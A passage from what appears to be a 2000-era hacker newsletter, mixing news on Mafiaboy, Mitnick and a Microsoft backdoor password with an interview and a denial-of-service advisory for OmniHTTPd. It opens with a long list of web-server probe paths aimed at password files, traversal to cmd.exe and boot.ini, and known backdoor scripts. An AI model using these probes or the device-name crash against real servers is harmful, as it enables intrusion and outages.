/cgi-bin/program.pl
/cgi-bin/ntitar.pl
/cgi-bin/enter.cgi
/cgi-bin/test.html
/cgi-bin/test-unix.html
/cgi-bin/printenv
/cgi-bin/dasp/fm_shell.asp
/cgi-bin/cgiback.cgi
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/gH.cgi
/cgi-bin/rwwwshell.pl
/cgi-bin/php
/cgi-bin/perl
/cgi-bin/wwwboard.cgi
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/password
/cgi-bin/password.txt
/cgi-bin/flexform.cgi
/cgi-bin/MachineInfo
/cgi-bin/lwgate
/cgi-bin/lwgate.cgi
/cgi-bin/LWGate
/cgi-bin/LWGate.cgi
/cgi-bin/nlog-smb.cgi
/cgi-bin/icat
/cgi-bin/tst.bat
/com1
/com2
/com3
/con
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/_vti_bin/shtml.dll
/_vti_bin/shtml.exe
/_vti_bin/fpcount.exe
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-win/uploader.exe
/cgi-shl/win-c-sample.exe
/scripts/issadmin/bdir.htr
/scripts/CGImail.exe
/scripts/tools/newdsn.exe
/scripts/fpcount.exe
/scripts/no-such-file.pl
/scripts/counter.exe
/scripts/uploadn.asp
/scripts/convert.bas
/scripts/iisadmin/ism.dll
/scripts/tools/getdrvrs.exe
/scripts/tools/dsnform.exe
/scripts/samples/search/webhits.exe
/scripts/../../cmd.exe
/scripts/webbbs.exe
/scripts/samples/ctguestb.idc
/scripts/samples/details.idc
/scripts/cpshost.dll
/scripts/tools/getdrvs.exe
/scripts/pu3.pl
/scripts/proxy/w3proxy.dll
/WebShop/templates/cc.txt
/WebShop/logs/cc.txt
/WebShop/logs/ck.log
/config/orders.txt
/config/import.txt
/config/checks.txt
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/cfdocs/expelval/openfile.cfm
/cfdocs/expelval/exprcalc.cfm
/cfdocs/expelval/displayopenedfile.cfm
/cfdocs/expelval/sendmail.cfm
/cfdocs/cfmlsyntaxcheck.cfm
/cfdocs/snippets/fileexist.cfm
/iissamples/exair/howitworks/codebrws.asp
/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/iissamples/query.asp
/iissamples/exair/search/advsearch.asp
/iisadmpwd/achg.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/anot.htr
/iisadmpwd/anot3.htr
/pw/storemgr.pw
/config/mountain.cfg
/orders/mountain.cfg
/quikstore.cfg
/PDG_Cart/shopper.conf
/search97.vts
/carbo.dll
/msadc/Samples/SELECTOR/showcode.asp
/adsamples/config/site.csc
/Admin_files/order.log
/mall_log_files/order.log
/PDG_Cart/order.log
/doc
/doc Boa?? 8-)
/.html/............./config.sys
/ssi/envout.bat
/~root
/server%20logfile
/....../autoexec.bat
/perl/files.pl
/lpt
/AdvWorks/equipment/catalog_type.asp
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/admin.php3
/code.php3
/bb-dnbd/bb-hist.sh
/domcfg.nsf
/today.nsf
/names.nsf
/catalog.nsf
/log.nsf
/domlog.nsf
/secure/.htaccess
/secure/.wwwacl
/WebSTAR
/msadc/msadcs.dll
/?PageServices
/_AuthChangeUrl?
/........./autoexec.bat
/.html/............/autoexec.bat
/......../
/eatme.idc
/eatme.ida
/eatme.pl
/eatme.idq
/eatme.idw
/default.asp
/default.asp::$DATA
/default.asp.
/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
/samples/
/photoads/cgi-bin/env.cgi
/photoads/cgi-bin/
/photoads/
/session/admnlogin
/session/adminlogin?RCpage=/sysadmin/index.stm
/cfappman/index.cfm
/samples/search/queryhit.htm
/msadc/msadcs.dll
/publisher/|publisher
/PSUser/PSCOErrPage.htm
../../boot.ini
../..
/aux
/status
/log
@HWA
06.0 Project Gamma interviews SpaceRogue of HNN
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Space Rogue
Date Published: March 12, 2000 Date Conducted: March 11, 2000 Interview
Conducted By: WHiTe VaMPiRe Interview Conducted With: Space Rogue
Space Rogue is the editor of the Hacker News Network, a member of
L0pht Heavy Industries (Now @Stake) -- he also previously maintained
the Whacked Mac Archives, one of the largest Macintosh
hacking-related sites on the Internet.
Questions are colored and Space Rogue's answers are indented.
How did you first get involved with computing?
A door to door Osborne Salesperson came to my house. Showed us an
Osborne One. While our family could not afford it $2,000+ that is
where I started. I convinced him to come back several times on the
premise of maybe we will buy it. In those few hours I learned a lot.
What would you consider your first computer?
Commodore 64.
What projects were you involved with before the L0pht?
Nothing anyone would know about.
How did you get involved with the L0pht?
I knew most of the other founders for years via local bulletin board
systems.
What are your feelings on the merger of the L0pht and @Stake?
A good thing in general, it allows time and resources to be devoted
to important projects that would never have been possible before.
What initially brought you to create the Hacker News Network?
I was sharing URLs with a small group of people and decided that it
would be better to put them on the web and share them with a larger
audiance.
Many have noticed that after the L0pht / @Stake merger the commercial
content was removed from HNN. How else will the merger effect HNN?
@Stake is commited to vendor neutrality which is why all
advertisements where removed. You will also notice the removal of
the HNN Store and no more T-shirt sales. In the future you can
expect even more changes including even the name of the site as it
gets integrated into the @Stake corporate web presence.
What do you have planned for HNN's future?
HNN's future is pretty much out of my hands at the moment.
Do you have any comments on the medias interpretation of "hackers,"
"crackers," and the related communities?
This is an ongoing battle sometimes I think we are winning, and
other times I think we have failed miserably. There are some
journalists out there who actually 'get it' but many many others
need to be educated.
Do you think the media has at all improved with its coverage of 'hacking'
related topics in the past few years?
Well they have given it more coverage, not sure if that qualifies as
an improvement though. This is especially evident during fast moving
critical stories such as the recent DDoS attacks. Some news outlets
got it right but many more got it wrong.
How do you think they could improve their coverage and cut down the FUD
(Fear, Uncertainty, and Doubt)?
Education. Unfortunately many reporters have little to no
understanding of technology.
Why was the name of Project BootyCall changed to TBA?
No comment.
What is your opinion on Web site defacements?
Most are childish and serve no purpose. You would think that people
who are taking such an immense risk of going to jail would have
something better to say that 'Props to my peeps.'
The Hacker News Network is accessible at http://www.hackernews.com/.
Space Rogue can be contacted via spacerog@l0pht.com.
@HWA
07.0 MS Engineers plant secret anti-Netscape password
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by MerXor
MS admits planting secret password
Microsoft engineers placed a password in
server software that could be used to gain
illicit access to hundreds of thousands of
Internet sites worldwid
e.
By Ted Bridis, WSJ Interactive Edition
April 14, 2000 4:34 AM PT
Microsoft Corp. acknowledged Thursday that its
engineers included in some of its Internet software a
secret password -- a phrase deriding their rivals at
Netscape as "weenies" -- that could be used to gain
illicit access to hundreds of thousands of Internet
sites worldwide.
The manager of Microsoft's security-response center,
Steve Lipner, acknowledged the online-security risk in an
interview Thursday and described such a backdoor
password as "absolutely against our policy" and a firing
offense for the as-yet-unidentified employees.
The company planned to warn customers as soon as
possible with an e-mail bulletin and an advisory published
on its corporate Web site. Microsoft (Nasdaq: MSFT)
urged customers to delete the computer file--called
"dvwssr.dll"--containing the offending code. The file is
installed on the company's Internet-server software with
Frontpage 98 extensions.
While there are no reports that the alleged security flaw
has been exploited, the affected software is believed to be
used by many Web sites. By using the so-called back
door, a hacker may be able to gain access to key
Web-site management files, which could in turn provide a
road map to such things as customer credit-card
numbers, said security experts who discovered the
password.
Two security experts discovered the rogue computer code
-- part of which was the denigrating comment "Netscape
engineers are weenies!" -- buried within the 3-year-old
piece of software. It was apparently written by a Microsoft
employee near the peak of the hard-fought wars between
Netscape Communications Corp. and Microsoft over their
versions of Internet-browser software. Netscape later was
acquired by America Online Inc.
One of the experts who helped identify the file is a
professional security consultant known widely among the
Internet underground as "Rain Forest Puppy." Despite his
unusual moniker, he is highly regarded by experts and
helped publicize a serious flaw in Microsoft's
Internet-server software last summer that put hundreds of
high-profile Web sites at risk of intrusion.
Almost every Web-hosting provider
Russ Cooper, who runs the popular NT Bugtraq
discussion forum on the Internet, estimated that the
problem threatened "almost every Web-hosting provider."
"It's a serious flaw,"
Cooper said. "Chances
are, you're going to find
some major sites that
still have it enabled."
Lipner of Microsoft said
the company will warn
the nation's largest
Web-site providers
directly.
In an e-mail to Microsoft earlier Thursday, Rain Forest
Puppy complained that the affected code threatened to
"improve a hacker's experience." Experts said the risk
was greatest at commercial Internet-hosting providers,
which maintain hundreds or thousands of separate Web
sites for different organizations.
Lipner said the problem doesn't affect Internet servers
running Windows 2000 or the latest version of its server
extensions included in Frontpage 2000.
The digital gaffe initially was
discovered by a
Europe-based employee of
ClientLogic Corp.
(www.clientlogic.com) of
Nashville, Tenn., which
sells e-commerce
technology. The company declined to comment because
of its coming stock sale. The other expert, Rain Forest
Puppy, said he was tipped off to the code by a
ClientLogic employee.
When asked about the hidden insult Thursday, Jon
Mittelhauser, one of Netscape's original engineers, called
it "classic engineer rivalry."
@HWA
08.0 b0f:Omni HTTPD Pro v2.06 for Win9x and NT DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Main site/home page is http://b0f.freeBSD.lublin.pl/ and is run by
Venglin of b0f.
(NOTE: www.b0f.com, is the old site and that site may be phased out in
the future.- Ed)
-=-
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 3
Advisory Name: Omni HTTPD Pro v2.06 for Win9x and NT DoS
Date: 12/4/00
Application: Omni HTTPD Pro v2.06 (probably others?)
Vendor: Omnicron Tehnologies Corporation
WWW: http://www.omnicron.ab.ca
Severity: Any user can simply crush remote server with installed
OmniHTTP daemon
Author: sirius ( sirius@linuxfan.com )
Homepage: www.b0f.com
* Overview
Quote from Omnicron Technologies Web site:
"OmniHTTPd is a powerful all-purpose industry compliant web server built
specifically for the Windows 95/98/NT4 platform. In addition to
Standard CGI support, the server sports advanced features such as
Keep-Alive connections, table auto-indexing and server-side includes. For
maximum performance, OmniHTTPd is both 32-bit and multi-threaded. Many
users agree that OmniHTTPd is the fastest and most compact web server
available for the Windows platform ..."
* The Problem
It is possible to crash OmniHttpD Pro. v2.06 (maybe other versions)
because it parse the path strings to call some FAT32/VFAT routines
in the kernel which makes your system unstable and useless until next
reboot.
If you request following directories:
/com1,/com2,/com3,/aux,/lpt1,/lpt2,/clock$,/config$,/nul (and maybe others
but not /con)
the web server accepts the connection.
e.g. if you request /com3 directory on remote server and if it has a modem
device installed on com. port 3 it will crash connection of remote
server and you will have to reboot the machine.
If you have installed device on com. ports and if the remote user request
directory which name matches the name of one device driver (e.g.
/aux) it will crash that device ... if you succeed you will get error 403
: forbidden error.
* Vulnerable Versions
- OmniHttpd version 2.06 Pro under Win98, NT not tested - maybe
other earlier versions
* Fix
Unknown for now, I mailed Omnicron Technologies ... they will probably fix
this bug in next version.
* Additional informations:
Well, i played with this thing and went to SecurityFocus.com to check for
this bug and I found securax security advisory 01 with some general
informations about this bug so if you need more informations read that
advisory at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-1&
thread=4.2.0.58.20000306111151.00992c60@urc1.cc.kuleuven.ac.be
copyright © 1999-2000 sirius ,
buffer0verfl0w security www.b0f.com
@HWA
09.0 Judge bans Mitnick from taking part in tech conference
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://deseretnews.com/dn/view/0,1249,160008642,00.html?
Federal judge bans convicted hacker from taking part in tech conference
A federal judge Monday banned convicted computer hacker Kevin Mitnick
from taking part in a technology conference in Salt Lake City Wednesday.
Mitnick, who gained notoriety for his hacking exploits and spent several
years in a federal prison in Lompac, Calif., won't be sitting on a
computer security panel discussion at the Utah Information Technologies
Association conference at the Salt Palace Convention Center. The judge
kiboshed the appearance because Mitnick's prison release agreement
prohibits him from "consulting or advising" on the topic of
computer-related activity.
Monday, Mitnick did an extended interview promoting the panel discussion
on KSL's Doug Wright Show, where he answered callers' questions about
computer security and told the story of his hacking exploits. He
hacked for fun, he said, and never made any money from it.
Richard Nelson, president of UITA, said Mitnick's public relations
representative had indicated that Mitnick had permission to appear from
the U.S. probation office in California. A few days ago, the
organization learned he might not be able to leave California.
Conference organizers are in the process of arranging a replacement for
Mitnick on the cyber-security panel. They are planning on bringing in a
senior staffer from a large company that deals with cyber security.
Nelson said he's sorry Mitnick can't participate. "He's eager to talk and
disappointed he can't come. If you listened (to him on the radio show),
he recognizes he made serious mistakes and he wanted to go forward.
"We're not trying to promote his career, but if he can help information
technology companies in Utah and decision makers dealing with security
issues determine what level of risk they want to take, that's good.
There will always be risk, but you can reduce it by taking security
measures." The UITA conference, "Net Trends 2000: The Digital Revolution"
takes place Wednesday and Thursday.
@HWA
10.0 The continuing saga of MAFIABOY king lemur of DDoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.usatoday.com/usatonline/20000421/2187297s.htm
Hacker's friends may be suspects in cyberattacks
By Kevin Johnson
USA TODAY
WASHINGTON -- Authorities investigating the February attacks on
some of the most popular Internet sites are focusing on three close friends
of the 15-year-old Canadian boy who was charged earlier this week, a
senior U.S. law enforcement official said Thursday.
The three friends of the Montreal computer hacker known as ''Mafiaboy''
are among several potential suspects identified by authorities in the
cyberassaults that temporarily shut down the Web sites of CNN, Yahoo,
Amazon.com and several other media and commercial giants.
Beyond Montreal, authorities are examining the activities of a small group
of hackers thought to be based in Israel. Officials there say the group has
been involved in various online financial crimes, some involving stolen
credit card numbers.
The group is believed to be part of a larger circle of computer users,
including Mafiaboy, who have spent time in an Internet chat room called
TNT. The chat room is accessible only by password.
Investigators also are trying to determine whether Dennis Moran, a
17-year-old New Hampshire hacker known online as ''Coolio,'' was
involved in the attacks in February.
Moran, who authorities say has boasted of being involved in the attacks,
was charged last month in an attack on a Web site run by the Los Angeles
Police Department.
The unidentified Montreal teenager known as Mafiaboy has been charged
only in two attacks against CNN.com, which was shut down for 3 1/2
hours Feb. 8 after it was overloaded with requests.
Mafiaboy claimed credit in chat rooms for similar assaults on sites run by
Yahoo and Buy.com. Officials believe Mafiaboy may have been capable
of directing all the assaults but doubt that he did.
Analysts familiar with the assaults say the software used to wall off access
to the CNN Web site on Feb. 8 was different and less sophisticated than
that used to paralyze Yahoo on Feb. 7.
Michael Lyle, who runs a software security firm in Palo Alto, Calif., said
the attack on CNN involved software commonly found on Internet sites
for hackers.
''I literally could show you how to do it in three or four hours,'' he said.
The goal is to flood Internet sites with tens of thousands of requests,
disguising the source of the assault by routing the requests through
high-capacity computers elsewhere. The tactic overloads the targeted
Web sites, causing electronic paralysis.
Investigators say Mafiaboy orchestrated the attack on CNN.com through
computers at the University of California-Santa Barbara.
A Canadian law enforcement official said that because of Mafiaboy's age,
it is unlikely he would be sent to an adult prison if convicted of ''mischief to
data.''
If prosecuted and convicted as an adult, the teenager could face up to 20
years in prison. But in Canada's juvenile system, he faces a maximum of
two years in a youth detention center if convicted.
@HWA
10.1 Mafiaboy reaction: "yeah right"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.wired.com/news/print/0,1294,35785,00.html
Mafiaboy Reaction: 'Yeah, Right'
by Leander Kahney
2:20 p.m. Apr. 19, 2000 PDT
The hacking community is skeptical that the Canadian Royal Mounted Police
have nabbed the perpetrator of Februarys highly publicized denial of
service attacks.
Following news that the Mounties charged a Montreal juvenile in the
attacks, hackers are demanding evidence that the 15-year-old known by the
alias "Mafiaboy" was indeed involved.
"Im highly skeptical," said B.K. DeLong, a member of Attrition.org, an
Internet security group that monitors and archives website cracks and
defacement.
"I don't think they've found the person who did the attacks. I think law
enforcement is stalling the press and public to keep them off their backs
while they find the real person," DeLong said.
DeLong said his skepticism was based on what appears to be a paucity of
evidence linking "Mafiaboy" to the attacks. According to initial reports,
the RCMP found computer logs and the transcript of an online chat group
that led them to file the charges against the teen, whose real
identity is shielded by Canadian law.
DeLong said law enforcement had already blundered in the case with the
arrest of Coolio, a.k.a. Dennis Moran, who was detained by New Hampshire
police in March in relation to the attacks, but later was charged with the
unrelated defacement of a Los Angeles Police Department anti-drug
site.
DeLong also noted that denial of service attacks are notoriously difficult
to investigate and there has been a suspiciously long delay between the
attacks and the charges.
"I think they should show some definite evidence how they got this guy,"
said Scully, editor of Cipherwar, a technology and politics site. "Chat
list logs are not enough."
Scully said that law enforcement agencies have a poor record of finding
and charging cyber-criminals, as evidenced by the four years notorious
computer hacker Kevin Mitnick was incarcerated awaiting trial.
This is the second time "Mafiaboy" has been linked to the attacks.
Mafiaboy - whoever that may be -- first was tabbed as a potential
perpetrator of the attacks by an Internet security firm about a week after
they occurred.
Even then, hackers expressed their doubts Mafiaboy was involved.
"I seriously doubt that this guy is an actual suspect," Space Rogue,
editor of the Hackers News Network, told Wired News at the time. "Maybe he
did it, but the information I have doesn't point to that at all."
10.2 Mafiaboy's dad gets busted for conspiracy to DDoS a business associate's head
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I kid you not, I suppose his mum will be up on solicitation charges next...
-Ed
http://www.wired.com/news/print/0,1294,35836,00.html
Like Mafia Son, Like Mafia Dad Wired News Report
10:45 a.m. Apr. 21, 2000 PDT Mafiaboy didn't fall far from the tree,
it seems.
Turns out the Canadian police tapped into some rather incriminating
telephone calls placed by the 15-year-old cracker's dad, who allegedly
took out a contract on a business colleague.
See also: Hot On the Trail of 'Mafiaboy' Reno: 'We Must Punish
Mafiaboy' Mafiaboy Reaction: 'Yeah, Right'
Lieutenant Lenny Lechman said Mafiaboy's 45-year-old father was arrested
last week and charged with conspiring to commit bodily harm.
"We felt that before somebody gets hurt really badly, we had to intervene
as quickly as possible," Lechman said.
Mafiaboy was charged earlier this week with two counts of mischief for a
Feb. 8 denial-of-service attack on CNN.com. He was fingered as a suspect
back in February by Michael Lyle, chief technical officer of
Internet-security firm Recourse Technologies Inc..
Mafiaboy's dad, whose real name is John Calce, was released on bail
Monday.
Mafiaboy himself has also been released, with a Kevin Mitnickian-like
stipulation that he stay away from computers.
Canadian police said they are still analyzing data found on the alleged
cracker's seized computers.
@HWA
10.3 On another mafiaboy note, a new site has popped up on Geocities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.geocities.com/freemafiaboy/
gullible adj 1: easily deceived or tricked ; synonymous with Michael Lyle
Michael Lyle is considered to be a computer security expert....
He is cofounder and Chief Technology Officer of Recourse Technologies in
sunny Palo Alto California, which sells anti-hacker software programs.
Also, he used to work for Exodus Communications whom experienced an
embarrassing hacker break-in while he was employed there, and admits
that he himself used to be a hacker. He goes by the nickname Icee on IRC.
He told ABC he had communicated with Mafiaboy on IRC, and the 15-year-old
said he had attacked not only CNN.com but also E+Trade. Their is now
definitive proof that he was NOT talking with whom he believed was mafiaboy.
Mafiaboy is a 15 year old Canadian.
He was arrested on April 15 and charged with two counts of mischief to data
for the attack that jammed up to 1,200 CNN-hosted Web sites for four hours
Feb. 8.
This website documents the extreme carelessness Michael Lyle showed in his
"investigation" of the DDoS attacks that recently plagued CNN, Yahoo,Amazon,
and E-trade. He is quoted in multiple news articles saying that he had
conversations on IRC with "mafiaboy", who he claims admitted to the attacks
on CNN and E-trade. The methods he used to accertain that this was the the
real "mafiaboy" or if "mafiaboy" actually launched any of these attacks were
extremely inefficient. This website contains concrete proof(from 2600.com)
that on at least one occasion he was not talking to who he believed was
mafiaboy. He later cited information from that same conversation in an
interview with ABC. The General Public should not be constantly under
these misconceptions the media is providing. Upon reading the IRC logs
from 2600.com you will certainly question how gullible Michael Lyle is.
Maybe he was just to focused on the fact of catching the perpetrator of
these "hacker" crimes, so he could claim fame to himself and his company
Recourse Technologies.... and get rich in the process.
Is Mafiaboy real or a creation of the media? 04/20/00
This is the link to the IRC logs which show Michael's conversation with
whom he believed was mafiaboy. Icee is Michael Lyle, while "[mafiaboy]"
is someone from 2600 staff posing as him. This is an extremely hilarious
conversation when you take into the fact that this is all a joke played
on the "security expert" Michael Lyle.
Below are various news stories I found online about mafiaboy.
Probe of Hacker Nets a Second Suspect:
His Father 04/21/2000 NEW INFO IN THIS ARTICLE
The Challenge of Fighting Cybercrime ....04.20.00
Janet Reno licks chops over Mafiaboy arrest 04/20/2000 5:11pm
Canadian Teen Charged in Web Blitz Thursday, April 20, 2000
Canada Arrests 'Mafiaboy' Hacker, Aged 15 Apr 19 2000 7:49PM ET
Canadian Arrest Made in February Web Attacks 04/19/2000 10:10:00 ET
Reno Says 'Mafiaboy' Hacker Must Face Punishment Apr 19 2000 11:04AM ET
Mafiaboy Suspected Feb. 16 This is pretty old..
but has some of the initial info.
I have absolutely no idea whether or not mafiaboy is the same person as
the Canadian teen arrested or if mafiaboy is even the individual
responsible for the crimes. I have never conversed with anyone named
mafiaboy and have no idea who he is.
Comments can be e-mailed to Taelon@mail.com
@HWA
10.4 Mafiaboy:Probe of Hacker Nets a Second Suspect: His Father
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.washingtonpost.com/wp-dyn/business/A53181-2000Apr20.html
Probe of Hacker Nets a Second Suspect: His Father
By Steven Pearlstein and David A. Vise
Washington Post Staff Writers
Friday , April 21, 2000 ; A01
ILE-BIZARD, Quebec -- There may be more to the computer moniker "Mafiaboy"
than first believed.
Montreal police said today that they moved in on the 15-year-old hacker
last weekend after learning from wiretaps that his father had taken out a
contract to harm or frighten a business associate and that the
attack was imminent. They had wiretapped the boy's house shortly after
U.S. and Canadian investigators identified that someone who lived there
had launched a disabling computer attack that had shut down CNN's Web
site and possibly other big sites in February.
"We didn't think we could wait any longer," a Canadian police official
said.
Mafiaboy had bragged in online chats and to friends that he had taken down
CNN.com, Amazon.com, Buy.com, eBay and E-Trade, but they didn't believe
him. Federal law enforcement officials in Canada and the United
States took note, however, following up on tips and tracing the
electronic path that led to Mafiaboy's neighborhood in the West Island
section of Montreal, sources familiar with the probe said.
The wiretaps were intended to pick up evidence against the boy and leads
about possible collaborators. Inadvertently, however, a police official
said they also picked up phone conversations from the boy's
45-year-old father, president of a transportation company, as he conspired
with a hit man about harming or scaring a business associate.
Police moved in on both father and son at 3 a.m. Saturday at their home,
charging the son with two counts of "mischief" with data and the father
with two counts of conspiracy to cause bodily harm.
The father, John Calce, was released Monday on $2,000 (U.S.) bail and
ordered not to get within 300 yards of the house or office of the man he
had allegedly targeted.
The boy was also released from detention on the condition that he not
associate with his three closest friends. Canadian law enforcement
officials said yesterday they wanted to prevent Mafiaboy from
using computers belonging to his friends and also did not want him
to attempt to silence his friends, who could be witnesses against him in
the case.
The Royal Canadian Mounted Police, which is handling the investigation of
Mafiaboy's computer hacking, indicated today it expects further charges
will be brought against the boy once they have had a chance to
review all of the evidence and the weeks of wiretaps on the house.
U.S. and Canadian authorities also expect to charge others who may or may
not have collaborated with the Montreal boy, whom police described
as a somewhat amateurish hacker.
There are no indications that the boy is cooperating with the
investigation, and his attorney said yesterday that he intends to shift
the focus from his client to the Web sites that should have
better protected themselves against computer vandalism.
"We can already foresee a long, complex and very technical trial which
will certainly shed light on how a 15-year-old could have done what he is
accused of, to a multinational corporation which almost
certainly could have been expected to be equipped with the most
sophisticated and up-to-date security systems," said lawyer Yan
Romanowski.
The Riverdale High School student with the Mafiaboy screen name struggled
in classes and was transferred to Riverdale this year after being
suspended repeatedly from another school closer to his home,
classmates and law enforcement officials confirmed today. They said
he excelled in one course: computers.
Known as a computer whiz but a constant discipline problem--he had been
suspended from Riverdale twice this year--he frequently talked back to his
English and math teachers, banging his desk and rarely showing up
for class with books and completed homework, according to friends
and classmates who gathered for hot dogs today at La Belle Province, one
block from the campus.
The friends, all of whom declined to give their names, said Mafiaboy had
been bragging about his hacking exploits for the past several weeks.
"I didn't believe him," said one. "He was a bit of a showoff."
"He had a real attitude," said another as he waited for the No. 205 bus
after school. "He wanted to graduate someday, but he knew he had
problems."
Mafiaboy was described by his classmates as bright, engaging, outgoing and
loyal to his friends. He hung out generally with the tough guys and was
known to smoke cigarettes. In dress, he favors baggy pants, a
loose-fitting yellow jacket and Nike T-shirts and shoes.
"He likes to chill the girls after school," said one student having a
cigarette at "The Pit," the unofficial smoking area just outside the
school fence, at lunch time. Although he is said to have had one
or two girlfriends over the years, he does not have one now,
classmates said.
The 5-foot-11 youth played guard in a Saturday afternoon basketball league
on a team called the Brookwood Jazz. He may have more time to shoot hoops
in the weeks ahead, since conditions of his release forbid him
from using the Internet, entering a business with computers or going into
a computer store. He is only allowed to use computers at school under the
strict supervision of teachers and even then, is not allowed to
access the Internet. Canadian police are examining the computers seized
from the boy's house in the Saturday morning raid.
Although he was in biology class yesterday when police announced details
of his weekend arrest, he was reportedly not in school today, on the eve
of a five-day Easter recess in Montreal-area schools.
Riverdale is an ethnically and economically mixed high school in a largely
English-speaking neighborhood, with about 1,200 students. More than half
its students go on to community college or university. Students
are required to wear uniforms.
Mafiaboy lives about a 12-minute drive from the school in a new
development of large brick and stone mini-mansions arrayed around the new
St. Raphael Golf Course.
Yesterday, a "for sale" sign was visible on the lawn of the family's
sea-foam-green brick house, as it has been for four months. The asking
price was recently reduced below $250,000 (U.S.). There is a
paved basketball court on the side.
A teenage boy who answered the door at the house late this afternoon
simply handed the visitor a lawyer's business card. Neighbors out in their
own yards told of a family that kept largely to itself. Mafiaboy's
father is divorced, and the boy and his brother were living with the
father and their stepmother.
One neighbor said the father liked to sit out on the front stoop in his
sweat suit and make loud telephone calls on his cellular telephone using
noticeably crude language.
U.S. and Canadian authorities have been monitoring the home where Mafiaboy
lives for weeks but the authorities said they did not move to make arrests
in the case until they were certain whose fingers were on the
keyboard.
Mafiaboy could be sentenced to a term of up to two years in juvenile
detention for disrupting CNN's Web site, Canadian officials said
yesterday, although they added that sentences for such crimes
typically are stiffer in the United States than in Canada.
"Young hackers, talking mostly now about 14- to 15-year-olds up to 22- or
23-year-olds, sometimes do not realize the damages they could make with
their actions," said Yves Roussell, officer in charge of the
Montreal commercial crime section of the RCMP.
Roussell said U.S. and Canadian politicians need to do a better job of
coordinating the legal penalties and sanctions for cross-border crimes,
including computer hacking, and said additional resources are
needed to fight hacking. He said the RCMP is studying the computers
and data taken from the home.
"There are literally tons of documentation and information to analyze and
scrutinize and devise and from there we will pursue our criminal
investigation," Roussell said. "We are still investigating the
case."
Vise reported from Washington.
© 2000 The Washington Post Company
@HWA
10.5 Mafiaboy:The Challenge of Fighting Cybercrime (Reno)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cipherwar.com/news/00/reno_2.htm
The Challenge of Fighting Cybercrime ....04.20.00
If you haven't heard, the Canadian police have arrested a 15 year-old boy
in connection with the February DDoS attacks. Canadian law protects
the suspect's privacy by prohibiting the release of Mafiaboy's true
identity. This fact alone is a refreshing change from the American way of
donig things. Arrest someone on the most pathetic evidence you can obtain,
like chat room logs, and release their identity, ruin their lives, and
then release them because there is not enough evidence.
Janet Reno, among other inadequate criminal investigators, claims that the
arrest proves that they can track down cybercriminals. Reno forgets
that an individual is innocent until proven guilty, therefore they have
not proven they can track down cybercriminals. And how long has it taken
them to even find a 15 year-old boy to pin it on? Mafiaboy was arrested in
Canada, and this is probably a good thing for him since the US Justice
Department would probably have hung him out to dry as the big bad hacker,
that he is probably not.
Just to show how ridiculous Janet Reno is, below is an exerpt, uncut, of
an address by Reno in February shortly after the DDoS attacks.
The entire "statement" can be found here:
http://www.cybercrime.gov/ag0216.htm.
The Challenge of Fighting Cybercrime
The recent attacks highlight some of the challenges we face in
combating cybercrime. The challenges come in many forms: technical
problems in tracing criminals operating online; resource issues
facing federal, state, and local law enforcement in being able to
undertake online criminal investigations and obtain evidence stored
in computers; and legal deficiencies caused by changes in
technology. I will discuss each of these briefly.
As a technical matter, the attacks like the ones we saw last week
are easy to carry out and hard to solve. The tools available to
launch such attacks are widely available. In addition, too many
companies pay inadequate attention to security issues, and are
therefore vulnerable to be infiltrated and used as launching pads
for this kind of destructive programs. Once the attacks are
carried out, it is hard to trace the criminal activity to its
source. Criminals can use a variety of methods to hide their
tracks, allowing them to operate anonymously or through masked
identities. This makes it difficult and sometimes impossible
to hold the perpetrator criminally accountable.
Even if criminals do not hide identities online, we still might be
unable to find them. The design of the Internet and practices
relating to retention of information means that it is often
difficult to obtain traffic data critical to an investigation.
Without information showing which computer was logged onto a
network at a particular point in time, the opportunity to determine
who was responsible may be lost.
There are other technical challenges, as well, that we must
consider. The Internet is a global medium that does not recognize
physical and jurisdictional boundaries. A hacker armed with no
more than a computer and modem can access computers anywhere
around the globe. They need no passports and pass no checkpoints
as they commit their crimes. While we are working with our
counterparts in other countries to develop an international
response, we must recognize that not all countries are as concerned
about computer threats as we are. Indeed, some countries have weak
laws, or no laws, against computer crimes, creating a major
obstacle to solving and to prosecuting computer crimes. I am
quite concerned that one or more nations will become "safe havens"
for cybercriminals.
Resource issues are also critical. We must ensure that law
